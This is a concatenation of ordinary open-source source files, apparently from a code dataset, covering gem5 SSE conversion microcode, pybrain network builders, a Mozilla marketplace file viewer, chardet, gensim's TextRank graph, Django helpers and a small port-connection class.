cvtf2f xmmh, xmmlm, destSize=8, srcSize=4, ext=2
cvtf2f xmml, xmmlm, destSize=8, srcSize=4, ext=0
};
def macroop CVTPS2PD_XMM_M {
ldfp ufp1, seg, sib, disp, dataSize=8
cvtf2f xmmh, ufp1, destSize=8, srcSize=4, ext=2
cvtf2f xmml, ufp1, destSize=8, srcSize=4, ext=0
};
def macroop CVTPS2PD_XMM_P {
rdip t7
ldfp ufp1, seg, riprel, disp, dataSize=8
cvtf2f xmmh, ufp1, destSize=8, srcSize=4, ext=2
cvtf2f xmml, ufp1, destSize=8, srcSize=4, ext=0
};
def macroop CVTPD2PS_XMM_XMM {
cvtf2f xmml, xmmlm, destSize=4, srcSize=8, ext=0
cvtf2f xmml, xmmhm, destSize=4, srcSize=8, ext=2
lfpimm xmmh, 0
};
def macroop CVTPD2PS_XMM_M {
ldfp ufp1, seg, sib, "DISPLACEMENT", dataSize=8
ldfp ufp2, seg, sib, "DISPLACEMENT + 8", dataSize=8
cvtf2f xmml, ufp1, destSize=4, srcSize=8, ext=0
cvtf2f xmml, ufp2, destSize=4, srcSize=8, ext=2
lfpimm xmmh, 0
};
def macroop CVTPD2PS_XMM_P {
rdip t7
ldfp ufp1, seg, riprel, "DISPLACEMENT", dataSize=8
ldfp ufp2, seg, riprel, "DISPLACEMENT + 8", dataSize=8
cvtf2f xmml, ufp1, destSize=4, srcSize=8, ext=0
cvtf2f xmml, ufp2, destSize=4, srcSize=8, ext=2
lfpimm xmmh, 0
};
'''
|
pybrain2/pybrain2
|
refs/heads/master
|
pybrain/tools/shortcuts.py
|
25
|
__author__ = 'Tom Schaul and Thomas Rueckstiess'
from itertools import chain
import logging
from sys import exit as errorexit
from pybrain.structure.networks.feedforward import FeedForwardNetwork
from pybrain.structure.networks.recurrent import RecurrentNetwork
from pybrain.structure.modules import BiasUnit, SigmoidLayer, LinearLayer, LSTMLayer
from pybrain.structure.connections import FullConnection, IdentityConnection
try:
from arac.pybrainbridge import _RecurrentNetwork, _FeedForwardNetwork
except ImportError as e:
logging.info("No fast networks available: %s" % e)
class NetworkError(Exception): pass
def buildNetwork(*layers, **options):
"""Build arbitrarily deep networks.
`layers` should be a list or tuple of integers, that indicate how many
neurons the layers should have. `bias` and `outputbias` are flags to
indicate whether the network should have the corresponding biases; both
default to True.
To adjust the classes for the layers use the `hiddenclass` and `outclass`
parameters, which expect a subclass of :class:`NeuronLayer`.
If the `recurrent` flag is set, a :class:`RecurrentNetwork` will be created,
otherwise a :class:`FeedForwardNetwork`.
If the `fast` flag is set, faster arac networks will be used instead of the
pybrain implementations."""
# options
opt = {'bias': True,
'hiddenclass': SigmoidLayer,
'outclass': LinearLayer,
'outputbias': True,
'peepholes': False,
'recurrent': False,
'fast': False,
}
for key in options:
if key not in list(opt.keys()):
raise NetworkError('buildNetwork unknown option: %s' % key)
opt[key] = options[key]
if len(layers) < 2:
raise NetworkError('buildNetwork needs 2 arguments for input and output layers at least.')
# Bind the right class to the Network name
network_map = {
(False, False): FeedForwardNetwork,
(True, False): RecurrentNetwork,
}
try:
network_map[(False, True)] = _FeedForwardNetwork
network_map[(True, True)] = _RecurrentNetwork
except NameError:
if opt['fast']:
raise NetworkError("No fast networks available.")
if opt['hiddenclass'].sequential or opt['outclass'].sequential:
if not opt['recurrent']:
# CHECKME: a warning here?
opt['recurrent'] = True
Network = network_map[opt['recurrent'], opt['fast']]
n = Network()
# linear input layer
n.addInputModule(LinearLayer(layers[0], name='in'))
# output layer of type 'outclass'
n.addOutputModule(opt['outclass'](layers[-1], name='out'))
if opt['bias']:
# add bias module and connection to out module, if desired
n.addModule(BiasUnit(name='bias'))
if opt['outputbias']:
n.addConnection(FullConnection(n['bias'], n['out']))
# arbitrary number of hidden layers of type 'hiddenclass'
for i, num in enumerate(layers[1:-1]):
layername = 'hidden%i' % i
if issubclass(opt['hiddenclass'], LSTMLayer):
n.addModule(opt['hiddenclass'](num, peepholes=opt['peepholes'], name=layername))
else:
n.addModule(opt['hiddenclass'](num, name=layername))
if opt['bias']:
# also connect all the layers with the bias
n.addConnection(FullConnection(n['bias'], n[layername]))
# connections between hidden layers
for i in range(len(layers) - 3):
n.addConnection(FullConnection(n['hidden%i' % i], n['hidden%i' % (i + 1)]))
# other connections
if len(layers) == 2:
# flat network, connection from in to out
n.addConnection(FullConnection(n['in'], n['out']))
else:
# network with hidden layer(s), connections from in to first hidden and last hidden to out
n.addConnection(FullConnection(n['in'], n['hidden0']))
n.addConnection(FullConnection(n['hidden%i' % (len(layers) - 3)], n['out']))
# recurrent connections
if issubclass(opt['hiddenclass'], LSTMLayer):
if len(layers) > 3:
errorexit("LSTM networks with > 1 hidden layers are not supported!")
n.addRecurrentConnection(FullConnection(n['hidden0'], n['hidden0']))
n.sortModules()
return n
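# Usage sketch (illustrative values only): the simplest call builds a
# 2-input, 3-hidden, 1-output feed-forward network with the default sigmoid
# hidden layer and linear output layer,
#
#     net = buildNetwork(2, 3, 1, bias=True)
#     out = net.activate([0.5, -0.2])    # propagate one input vector
#
# while an LSTM-based recurrent network can be requested with
#
#     rnet = buildNetwork(4, 6, 2, hiddenclass=LSTMLayer, recurrent=True)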
def _buildNetwork(*layers, **options):
"""This is a helper function to create different kinds of networks.
`layers` is a list of tuples. Each tuple can contain an arbitrary number of
layers, each being connected to the next one with IdentityConnections. Due
to this, all layers have to have the same dimension. We call these tuples
'parts.'
Afterwards, the last layer of one tuple is connected to the first layer of
the following tuple by a FullConnection.
If the keyword argument bias is given, BiasUnits are added additionally with
every FullConnection.
Example:
_buildNetwork(
(LinearLayer(3),),
(SigmoidLayer(4), GaussianLayer(4)),
(SigmoidLayer(3),),
)
"""
bias = options['bias'] if 'bias' in options else False
net = FeedForwardNetwork()
layerParts = iter(layers)
firstPart = iter(next(layerParts))
firstLayer = next(firstPart)
net.addInputModule(firstLayer)
prevLayer = firstLayer
for part in chain(firstPart, layerParts):
new_part = True
for layer in part:
net.addModule(layer)
# Pick class depending on whether we entered a new part
if new_part:
ConnectionClass = FullConnection
if bias:
biasUnit = BiasUnit('BiasUnit for %s' % layer.name)
net.addModule(biasUnit)
net.addConnection(FullConnection(biasUnit, layer))
else:
ConnectionClass = IdentityConnection
new_part = False
conn = ConnectionClass(prevLayer, layer)
net.addConnection(conn)
prevLayer = layer
net.addOutputModule(layer)
net.sortModules()
return net
|
ingenioustechie/zamboni
|
refs/heads/master
|
mkt/files/helpers.py
|
6
|
import codecs
import json
import mimetypes
import os
import time
from collections import OrderedDict
from django.conf import settings
from django.core.urlresolvers import reverse
from django.template.defaultfilters import filesizeformat
from django.utils.encoding import smart_unicode
import commonware.log
import jinja2
from cache_nuggets.lib import memoize, Message
from jingo import register
from django.utils.translation import ugettext as _
from appvalidator.testcases.packagelayout import (
blacklisted_extensions as blocked_extensions,
blacklisted_magic_numbers as blocked_magic_numbers)
import mkt
from mkt.files.utils import extract_zip, get_md5
from mkt.site.storage_utils import (copy_stored_file, local_storage,
private_storage, public_storage,
storage_is_remote, walk_storage)
from mkt.site.utils import env
# Allow files with a shebang through.
blocked_magic_numbers = [
b for b in list(blocked_magic_numbers) if b != (0x23, 0x21)]
blocked_extensions = [
b for b in list(blocked_extensions) if b != 'sh']
task_log = commonware.log.getLogger('z.task')
@register.function
def file_viewer_class(value, key):
result = []
if value['directory']:
result.append('directory closed')
else:
result.append('file')
if value['short'] == key:
result.append('selected')
if value.get('diff'):
result.append('diff')
return ' '.join(result)
@register.function
def file_tree(files, selected):
depth = 0
output = ['<ul class="root">']
t = env.get_template('fileviewer/node.html')
for k, v in files.items():
if v['depth'] > depth:
output.append('<ul class="js-hidden">')
elif v['depth'] < depth:
output.extend(['</ul>' for x in range(v['depth'], depth)])
output.append(t.render({'value': v, 'selected': selected}))
depth = v['depth']
output.extend(['</ul>' for x in range(depth, -1, -1)])
return jinja2.Markup('\n'.join(output))
class FileViewer(object):
"""
Provide access to a storage-managed file by copying it locally and
extracting info from it. `src` is a storage-managed path and `dest` is a
local temp path.
"""
def __init__(self, file_obj):
self.file = file_obj
self.addon = self.file.version.addon
self.src = (file_obj.guarded_file_path
if file_obj.status == mkt.STATUS_DISABLED
else file_obj.file_path)
self.dest = os.path.join(settings.TMP_PATH, 'file_viewer',
str(file_obj.pk))
self._files, self.selected = None, None
def __str__(self):
return str(self.file.id)
def _extraction_cache_key(self):
return ('%s:file-viewer:extraction-in-progress:%s' %
(settings.CACHE_PREFIX, self.file.id))
def extract(self):
"""
Will make all the directories and expand the files.
Raises error on nasty files.
"""
if self.file.status in mkt.LISTED_STATUSES:
storage = public_storage
else:
storage = private_storage
try:
tempdir = extract_zip(storage.open(self.src))
# Move extracted files into persistent storage.
for root, subdirs, files in os.walk(tempdir):
storage_root = root.replace(tempdir, self.dest, 1)
for fname in files:
file_src = os.path.join(root, fname)
file_dest = os.path.join(storage_root, fname)
copy_stored_file(file_src, file_dest,
src_storage=local_storage,
dst_storage=private_storage)
except Exception, err:
task_log.error('Error (%s) extracting %s' % (err, self.src))
raise
def cleanup(self):
try:
for root, dirs, files in walk_storage(
self.dest, storage=private_storage):
for fname in files:
private_storage.delete(os.path.join(root, fname))
except OSError as e:
if e.errno == 2:
# Directory doesn't exist, nothing to clean up.
return
raise
def is_extracted(self):
"""If the file has been extracted or not."""
return (private_storage.exists(
os.path.join(self.dest, 'manifest.webapp')) and
not Message(self._extraction_cache_key()).get())
def _is_binary(self, mimetype, path):
"""Uses the filename to see if the file can be shown in HTML or not."""
# Re-use the blocked data from amo-validator to spot binaries.
ext = os.path.splitext(path)[1][1:]
if ext in blocked_extensions:
return True
# S3 will return false for storage.exists() for directory paths, so
# os.path call is safe here.
if private_storage.exists(path) and not os.path.isdir(path):
with private_storage.open(path, 'r') as rfile:
bytes = tuple(map(ord, rfile.read(4)))
if any(bytes[:len(x)] == x for x in blocked_magic_numbers):
return True
if mimetype:
major, minor = mimetype.split('/')
if major == 'image':
return 'image' # Mark that the file is binary, but an image.
return False
def read_file(self, allow_empty=False):
"""
Reads the file. Imposes a file limit and tries to cope with
UTF-8 and UTF-16 files appropriately. Return file contents and
a list of error messages.
"""
try:
file_data = self._read_file(allow_empty)
# If this is a webapp manifest, we should try to pretty print it.
if (self.selected and
self.selected.get('filename') == 'manifest.webapp'):
file_data = self._process_manifest(file_data)
return file_data
except (IOError, OSError):
self.selected['msg'] = _('That file no longer exists.')
return ''
def _read_file(self, allow_empty=False):
if not self.selected and allow_empty:
return ''
assert self.selected, 'Please select a file'
if self.selected['size'] > settings.FILE_VIEWER_SIZE_LIMIT:
# L10n: {0} is the file size limit of the file viewer.
msg = _(u'File size is over the limit of {0}.').format(
filesizeformat(settings.FILE_VIEWER_SIZE_LIMIT))
self.selected['msg'] = msg
return ''
with private_storage.open(self.selected['full'], 'r') as opened:
cont = opened.read()
codec = 'utf-16' if cont.startswith(codecs.BOM_UTF16) else 'utf-8'
try:
return cont.decode(codec)
except UnicodeDecodeError:
cont = cont.decode(codec, 'ignore')
# L10n: {0} is the codec the file was decoded with.
self.selected['msg'] = (
_('Problems decoding {0}.').format(codec))
return cont
def _process_manifest(self, data):
"""
This will format the manifest nicely for maximum diff-ability.
"""
try:
json_data = json.loads(data)
except Exception:
# If there are any JSON decode problems, just return the raw file.
return data
def format_dict(data):
def do_format(value):
if isinstance(value, dict):
return format_dict(value)
else:
return value
# We want everything sorted, but we always want these few nodes
# right at the top.
prefix_nodes = ['name', 'description', 'version']
prefix_nodes = [(k, data.pop(k)) for k in prefix_nodes if
k in data]
processed_nodes = [(k, do_format(v)) for k, v in data.items()]
return OrderedDict(prefix_nodes + sorted(processed_nodes))
return json.dumps(format_dict(json_data), indent=2)
def select(self, file_):
self.selected = self.get_files().get(file_)
def is_binary(self):
if self.selected:
binary = self.selected['binary']
if binary and binary != 'image':
self.selected['msg'] = _('This file is not viewable online. '
'Please download the file to view '
'the contents.')
return binary
def is_directory(self):
if self.selected:
if self.selected['directory']:
self.selected['msg'] = _('This file is a directory.')
return self.selected['directory']
def get_default(self, key=None):
"""Gets the default file and copes with search engines."""
if key:
return key
return 'manifest.webapp'
def get_files(self):
"""
Returns an OrderedDict of all the files in the addon file, ordered by
filename, with the information needed to serve each file, build
templates, etc.
"""
if self._files:
return self._files
if not self.is_extracted():
return {}
# In case a cron job comes along and deletes the files
# mid tree building.
try:
self._files = self._get_files()
return self._files
except (OSError, IOError):
return {}
def truncate(self, filename, pre_length=15, post_length=10,
ellipsis=u'..'):
"""
Truncates a filename so that
somelongfilename.htm
becomes:
some...htm
as it truncates around the extension.
"""
root, ext = os.path.splitext(filename)
if len(root) > pre_length:
root = root[:pre_length] + ellipsis
if len(ext) > post_length:
ext = ext[:post_length] + ellipsis
return root + ext
def get_syntax(self, filename):
"""
Converts a filename into a syntax for the syntax highlighter, with
some modifications for specific common mozilla files.
The list of syntaxes is from:
http://alexgorbatchev.com/SyntaxHighlighter/manual/brushes/
"""
if filename:
short = os.path.splitext(filename)[1][1:]
syntax_map = {'xul': 'xml', 'rdf': 'xml', 'jsm': 'js',
'json': 'js', 'webapp': 'js'}
short = syntax_map.get(short, short)
if short in ['actionscript3', 'as3', 'bash', 'shell', 'cpp', 'c',
'c#', 'c-sharp', 'csharp', 'css', 'diff', 'html',
'java', 'javascript', 'js', 'jscript', 'patch',
'pas', 'php', 'plain', 'py', 'python', 'sass',
'scss', 'text', 'sql', 'vb', 'vbnet', 'xml', 'xhtml',
'xslt']:
return short
return 'plain'
@memoize(prefix='file-viewer', time=60 * 60)
def _get_files(self):
all_files, res = [], OrderedDict()
# Not using os.path.walk so we get just the right order.
def iterate(path):
path_dirs, path_files = private_storage.listdir(path)
for dirname in sorted(path_dirs):
full = os.path.join(path, dirname)
all_files.append(full)
iterate(full)
for filename in sorted(path_files):
full = os.path.join(path, filename)
all_files.append(full)
iterate(self.dest)
for path in all_files:
filename = smart_unicode(os.path.basename(path), errors='replace')
short = smart_unicode(path[len(self.dest) + 1:], errors='replace')
mime, encoding = mimetypes.guess_type(filename)
if not mime and filename == 'manifest.webapp':
mime = 'application/x-web-app-manifest+json'
if storage_is_remote():
# S3 doesn't have directories, so we check for names with this
# prefix and call it a directory if there are some.
subdirs, subfiles = private_storage.listdir(path)
directory = bool(subdirs or subfiles)
else:
directory = os.path.isdir(path)
res[short] = {
'binary': self._is_binary(mime, path),
'depth': short.count(os.sep),
'directory': directory,
'filename': filename,
'full': path,
'md5': get_md5(path) if not directory else '',
'mimetype': mime or 'application/octet-stream',
'syntax': self.get_syntax(filename),
'modified': (
time.mktime(
private_storage.modified_time(path).timetuple())
if not directory else 0),
'short': short,
'size': private_storage.size(path) if not directory else 0,
'truncated': self.truncate(filename),
'url': reverse('mkt.files.list',
args=[self.file.id, 'file', short]),
'url_serve': reverse('mkt.files.redirect',
args=[self.file.id, short]),
'version': self.file.version.version,
}
return res
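# --- hedged usage sketch (editor addition) --------------------------------
# The typical FileViewer flow, using only methods defined in this class.
# `some_file_obj` is a placeholder for a mkt File instance; it is not
# defined in this module.
#
#   viewer = FileViewer(some_file_obj)
#   if not viewer.is_extracted():
#       viewer.extract()                    # unpack the zip into private storage
#   files = viewer.get_files()              # OrderedDict keyed by short path
#   viewer.select(viewer.get_default())     # defaults to manifest.webapp
#   if not viewer.is_binary() and not viewer.is_directory():
#       contents = viewer.read_file()       # decoded text, size-limited
#   viewer.cleanup()                        # delete the extracted copies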
class DiffHelper(object):
def __init__(self, left, right):
self.left = FileViewer(left)
self.right = FileViewer(right)
self.addon = self.left.addon
self.key = None
def __str__(self):
return '%s:%s' % (self.left, self.right)
def extract(self):
self.left.extract(), self.right.extract()
def cleanup(self):
self.left.cleanup(), self.right.cleanup()
def is_extracted(self):
return self.left.is_extracted() and self.right.is_extracted()
def get_url(self, short):
url_name = 'mkt.files.compare'
return reverse(url_name,
args=[self.left.file.id, self.right.file.id,
'file', short])
def get_files(self):
"""
Get the files from the primary and:
- remap any diffable ones to the compare url as opposed to the other
- highlight any diffs
"""
left_files = self.left.get_files()
right_files = self.right.get_files()
different = []
for key, file in left_files.items():
file['url'] = self.get_url(file['short'])
diff = file['md5'] != right_files.get(key, {}).get('md5')
file['diff'] = diff
if diff:
different.append(file)
# Now mark every directory above each different file as different.
for diff in different:
for depth in range(diff['depth']):
key = '/'.join(diff['short'].split('/')[:depth + 1])
if key in left_files:
left_files[key]['diff'] = True
return left_files
def get_deleted_files(self):
"""
Get files that exist in right, but not in left. These
are files that have been deleted between the two versions.
Every element will be marked as a diff.
"""
different = OrderedDict()
left_files = self.left.get_files()
right_files = self.right.get_files()
for key, file in right_files.items():
if key not in left_files:
copy = right_files[key]
copy.update({'url': self.get_url(file['short']), 'diff': True})
different[key] = copy
return different
def read_file(self):
"""Reads both selected files."""
return [self.left.read_file(allow_empty=True),
self.right.read_file(allow_empty=True)]
def select(self, key):
"""
Select a file and adds the file object to self.one and self.two
for later fetching.
"""
self.key = key
self.left.select(key)
self.right.select(key)
return self.left.selected and self.right.selected
def is_binary(self):
"""Tells you if both selected files are binary."""
return self.left.is_binary() or self.right.is_binary()
def is_diffable(self):
"""Tells you if the selected files are diffable."""
if not self.left.selected and not self.right.selected:
return False
for obj in [self.left, self.right]:
if obj.is_binary():
return False
if obj.is_directory():
return False
return True
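# --- hedged usage sketch (editor addition) --------------------------------
# The DiffHelper flow, using only methods defined above. `old_file` and
# `new_file` stand in for two mkt File instances and are hypothetical.
#
#   diff = DiffHelper(old_file, new_file)
#   diff.extract()
#   files = diff.get_files()                # left-hand files, diffs flagged
#   deleted = diff.get_deleted_files()      # present only in the right-hand version
#   if diff.select('manifest.webapp') and diff.is_diffable():
#       left_text, right_text = diff.read_file()
#   diff.cleanup()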
def rmtree(prefix):
dirs, files = private_storage.listdir(prefix)
for fname in files:
private_storage.delete(os.path.join(prefix, fname))
for d in dirs:
rmtree(os.path.join(prefix, d))
private_storage.delete(prefix)
|
orekyuu/intellij-community
|
refs/heads/master
|
python/testData/quickFixes/PyMoveAttributeToInitQuickFixTest/addSuperCall_after.py
|
79
|
__author__ = 'ktisha'
class Base(object):
def __init__(self):
self.param = 2
class Child(Base):
def __init__(self):
super(Child, self).__init__()
self.my = 2
def f(self):
pass
|
sharad/calibre
|
refs/heads/master
|
src/chardet/charsetprober.py
|
216
|
######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Universal charset detector code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 2001
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
# Shy Shalom - original C code
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
import constants, re
class CharSetProber:
def __init__(self):
pass
def reset(self):
self._mState = constants.eDetecting
def get_charset_name(self):
return None
def feed(self, aBuf):
pass
def get_state(self):
return self._mState
def get_confidence(self):
return 0.0
def filter_high_bit_only(self, aBuf):
aBuf = re.sub(r'([\x00-\x7F])+', ' ', aBuf)
return aBuf
def filter_without_english_letters(self, aBuf):
aBuf = re.sub(r'([A-Za-z])+', ' ', aBuf)
return aBuf
def filter_with_english_letters(self, aBuf):
# TODO
return aBuf
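if __name__ == '__main__':
    # Hedged demonstration (editor addition): the sample byte string below is
    # illustrative. filter_high_bit_only() collapses every run of ASCII bytes
    # to a single space, leaving only high-bit bytes for the detectors;
    # filter_without_english_letters() does the same for runs of A-Z/a-z.
    prober = CharSetProber()
    sample = 'abc \xe3\x81\x82 def \xe3\x81\x84'
    print repr(prober.filter_high_bit_only(sample))  # ' \xe3\x81\x82 \xe3\x81\x84'
    print repr(prober.filter_without_english_letters(sample))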
|
Kreiswolke/gensim
|
refs/heads/develop
|
gensim/summarization/graph.py
|
65
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Licensed under the GNU LGPL v2.1 - http://www.gnu.org/licenses/lgpl.html
from abc import ABCMeta, abstractmethod
class IGraph(object):
""" Represents the interface or contract that the graph for TextRank
should implement.
"""
__metaclass__ = ABCMeta
@abstractmethod
def nodes(self):
"""
Return node list.
@rtype: list
@return: Node list.
"""
pass
@abstractmethod
def edges(self):
"""
Return all edges in the graph.
@rtype: list
@return: List of all edges in the graph.
"""
pass
@abstractmethod
def neighbors(self, node):
"""
Return all nodes that are directly accessible from given node.
@type node: node
@param node: Node identifier
@rtype: list
@return: List of nodes directly accessible from given node.
"""
pass
@abstractmethod
def has_node(self, node):
"""
Return whether the requested node exists.
@type node: node
@param node: Node identifier
@rtype: boolean
@return: Truth-value for node existence.
"""
pass
@abstractmethod
def add_node(self, node, attrs=None):
"""
Add given node to the graph.
@attention: While nodes can be of any type, it's strongly recommended
to use only numbers and single-line strings as node identifiers if you
intend to use write().
@type node: node
@param node: Node identifier.
@type attrs: list
@param attrs: List of node attributes specified as (attribute, value)
tuples.
"""
pass
@abstractmethod
def add_edge(self, edge, wt=1, label='', attrs=[]):
"""
Add an edge to the graph connecting two nodes.
An edge, here, is a pair of nodes like C{(n, m)}.
@type edge: tuple
@param edge: Edge.
@type wt: number
@param wt: Edge weight.
@type label: string
@param label: Edge label.
@type attrs: list
@param attrs: List of node attributes specified as (attribute, value)
tuples.
"""
pass
@abstractmethod
def has_edge(self, edge):
"""
Return whether an edge exists.
@type edge: tuple
@param edge: Edge.
@rtype: boolean
@return: Truth-value for edge existence.
"""
pass
@abstractmethod
def edge_weight(self, edge):
"""
Get the weight of an edge.
@type edge: edge
@param edge: One edge.
@rtype: number
@return: Edge weight.
"""
pass
@abstractmethod
def del_node(self, node):
"""
Remove a node from the graph.
@type node: node
@param node: Node identifier.
"""
pass
class Graph(IGraph):
"""
Implementation of an undirected graph, based on Pygraph
"""
WEIGHT_ATTRIBUTE_NAME = "weight"
DEFAULT_WEIGHT = 0
LABEL_ATTRIBUTE_NAME = "label"
DEFAULT_LABEL = ""
def __init__(self):
# Metadata about edges
# Mapping: Edge -> Dict mapping, label -> str, wt -> num
self.edge_properties = {}
# Key value pairs: (Edge -> Attributes)
self.edge_attr = {}
# Metadata about nodes
# Pairing: Node -> Attributes
self.node_attr = {}
# Pairing: Node -> Neighbors
self.node_neighbors = {}
def has_edge(self, edge):
u, v = edge
return (u, v) in self.edge_properties and (v, u) in self.edge_properties
def edge_weight(self, edge):
return self.get_edge_properties(edge).setdefault(self.WEIGHT_ATTRIBUTE_NAME, self.DEFAULT_WEIGHT)
def neighbors(self, node):
return self.node_neighbors[node]
def has_node(self, node):
return node in self.node_neighbors
def add_edge(self, edge, wt=1, label='', attrs=[]):
u, v = edge
if v not in self.node_neighbors[u] and u not in self.node_neighbors[v]:
self.node_neighbors[u].append(v)
if u != v:
self.node_neighbors[v].append(u)
self.add_edge_attributes((u, v), attrs)
self.set_edge_properties((u, v), label=label, weight=wt)
else:
raise ValueError("Edge (%s, %s) already in graph" % (u, v))
def add_node(self, node, attrs=None):
if attrs is None:
attrs = []
if node not in self.node_neighbors:
self.node_neighbors[node] = []
self.node_attr[node] = attrs
else:
raise ValueError("Node %s already in graph" % node)
def nodes(self):
return list(self.node_neighbors.keys())
def edges(self):
return [a for a in self.edge_properties.keys()]
def del_node(self, node):
for each in list(self.neighbors(node)):
if each != node:
self.del_edge((each, node))
del self.node_neighbors[node]
del self.node_attr[node]
# Helper methods
def get_edge_properties(self, edge):
return self.edge_properties.setdefault(edge, {})
def add_edge_attributes(self, edge, attrs):
for attr in attrs:
self.add_edge_attribute(edge, attr)
def add_edge_attribute(self, edge, attr):
self.edge_attr[edge] = self.edge_attributes(edge) + [attr]
if edge[0] != edge[1]:
self.edge_attr[(edge[1], edge[0])] = self.edge_attributes((edge[1], edge[0])) + [attr]
def edge_attributes(self, edge):
try:
return self.edge_attr[edge]
except KeyError:
return []
def set_edge_properties(self, edge, **properties):
self.edge_properties.setdefault(edge, {}).update(properties)
if edge[0] != edge[1]:
self.edge_properties.setdefault((edge[1], edge[0]), {}).update(properties)
def del_edge(self, edge):
u, v = edge
self.node_neighbors[u].remove(v)
self.del_edge_labeling((u, v))
if u != v:
self.node_neighbors[v].remove(u)
self.del_edge_labeling((v, u))
def del_edge_labeling(self, edge):
keys = [edge]
keys.append(edge[::-1])
for key in keys:
for mapping in [self.edge_properties, self.edge_attr]:
try:
del mapping[key]
except KeyError:
pass
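if __name__ == '__main__':
    # Hedged usage sketch (editor addition): builds a tiny undirected graph
    # with the Graph class above; node names and weights are illustrative.
    g = Graph()
    for node in ('a', 'b', 'c'):
        g.add_node(node)
    g.add_edge(('a', 'b'), wt=2)
    g.add_edge(('b', 'c'))
    print(sorted(g.nodes()))          # ['a', 'b', 'c']
    print(g.has_edge(('b', 'a')))     # True -- edges are undirected
    print(g.edge_weight(('a', 'b')))  # 2
    print(g.neighbors('b'))           # ['a', 'c']
    g.del_node('c')
    print(g.has_node('c'))            # False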
|
otherness-space/myProject
|
refs/heads/master
|
my_project_001/lib/python2.7/site-packages/django/core/mail/backends/console.py
|
137
|
"""
Email backend that writes messages to console instead of sending them.
"""
import sys
import threading
from django.core.mail.backends.base import BaseEmailBackend
class EmailBackend(BaseEmailBackend):
def __init__(self, *args, **kwargs):
self.stream = kwargs.pop('stream', sys.stdout)
self._lock = threading.RLock()
super(EmailBackend, self).__init__(*args, **kwargs)
def send_messages(self, email_messages):
"""Write all messages to the stream in a thread-safe way."""
if not email_messages:
return
with self._lock:
try:
stream_created = self.open()
for message in email_messages:
self.stream.write('%s\n' % message.message().as_string())
self.stream.write('-' * 79)
self.stream.write('\n')
self.stream.flush() # flush after each message
if stream_created:
self.close()
except:
if not self.fail_silently:
raise
return len(email_messages)
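# --- hedged usage sketch (editor addition) --------------------------------
# This backend is normally selected through settings rather than constructed
# directly. The dotted path below follows the stock Django convention; adjust
# it to wherever this module actually lives in your project.
#
#   # settings.py
#   EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
#
#   # Any code that sends mail now writes it to stdout instead:
#   from django.core.mail import send_mail
#   send_mail('Subject', 'Body', 'from@example.com', ['to@example.com'])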
|
anton-golubkov/Garland
|
refs/heads/master
|
src/ipf/ipfblock/connection.py
|
1
|
#-------------------------------------------------------------------------------
# Copyright (c) 2011 Anton Golubkov.
# All rights reserved. This program and the accompanying materials
# are made available under the terms of the GNU Lesser Public License v2.1
# which accompanies this distribution, and is available at
# http://www.gnu.org/licenses/old-licenses/gpl-2.0.html
#
# Contributors:
# Anton Golubkov - initial API and implementation
#-------------------------------------------------------------------------------
# -*- coding: utf-8 -*-
import ioport
import weakref
class Connection(object):
""" Connection class for IPFBlock
Connection binding OPort and IPort of some IPFBlocks
"""
def __init__(self, oport, iport):
# Check port compatibility and free of input port
if ioport.is_connect_allowed(oport, iport):
self._oport = weakref.ref(oport)
self._iport = weakref.ref(iport)
self._oport().increase_binded_count()
self._iport().set_binded()
else:
raise ValueError("Can not create Connection with given ports")
def __del__(self):
if self._oport() is not None:
self._oport().decrease_binded_count()
if self._iport() is not None:
self._iport().set_free()
def contains_port(self, port):
return self._iport() == port or self._oport() == port
def process(self):
""" Send value from output port to input port """
self._iport().pass_value(self._oport().get_value())
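# --- hedged usage sketch (editor addition) --------------------------------
# `some_oport` and `some_iport` are hypothetical OPort/IPort instances from
# two IPFBlocks; Connection() refuses incompatible or already-bound ports.
#
#   conn = Connection(some_oport, some_iport)
#   conn.process()                   # push the output port's value into the input port
#   conn.contains_port(some_iport)   # -> True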
|
faun/django_test
|
refs/heads/master
|
django/shortcuts/__init__.py
|
81
|
"""
This module collects helper functions and classes that "span" multiple levels
of MVC. In other words, these functions/classes introduce controlled coupling
for convenience's sake.
"""
from django.template import loader
from django.http import HttpResponse, Http404
from django.http import HttpResponseRedirect, HttpResponsePermanentRedirect
from django.db.models.manager import Manager
from django.db.models.query import QuerySet
from django.core import urlresolvers
def render_to_response(*args, **kwargs):
"""
Returns a HttpResponse whose content is filled with the result of calling
django.template.loader.render_to_string() with the passed arguments.
"""
httpresponse_kwargs = {'mimetype': kwargs.pop('mimetype', None)}
return HttpResponse(loader.render_to_string(*args, **kwargs), **httpresponse_kwargs)
def redirect(to, *args, **kwargs):
"""
Returns an HttpResponseRedirect to the appropriate URL for the arguments
passed.
The arguments could be:
* A model: the model's `get_absolute_url()` function will be called.
* A view name, possibly with arguments: `urlresolvers.reverse()` will
be used to reverse-resolve the name.
* A URL, which will be used as-is for the redirect location.
By default issues a temporary redirect; pass permanent=True to issue a
permanent redirect
"""
if kwargs.pop('permanent', False):
redirect_class = HttpResponsePermanentRedirect
else:
redirect_class = HttpResponseRedirect
# If it's a model, use get_absolute_url()
if hasattr(to, 'get_absolute_url'):
return redirect_class(to.get_absolute_url())
# Next try a reverse URL resolution.
try:
return redirect_class(urlresolvers.reverse(to, args=args, kwargs=kwargs))
except urlresolvers.NoReverseMatch:
# If this is a callable, re-raise.
if callable(to):
raise
# If this doesn't "feel" like a URL, re-raise.
if '/' not in to and '.' not in to:
raise
# Finally, fall back and assume it's a URL
return redirect_class(to)
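# --- hedged usage sketch (editor addition) --------------------------------
# The three argument styles described in the docstring above; the model
# instance, view name and URL are placeholders, not part of this module.
#
#   return redirect(some_model_instance)                     # uses get_absolute_url()
#   return redirect('news-detail', pk=article.pk)            # reversed view name
#   return redirect('http://example.com/', permanent=True)   # plain URL, permanent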
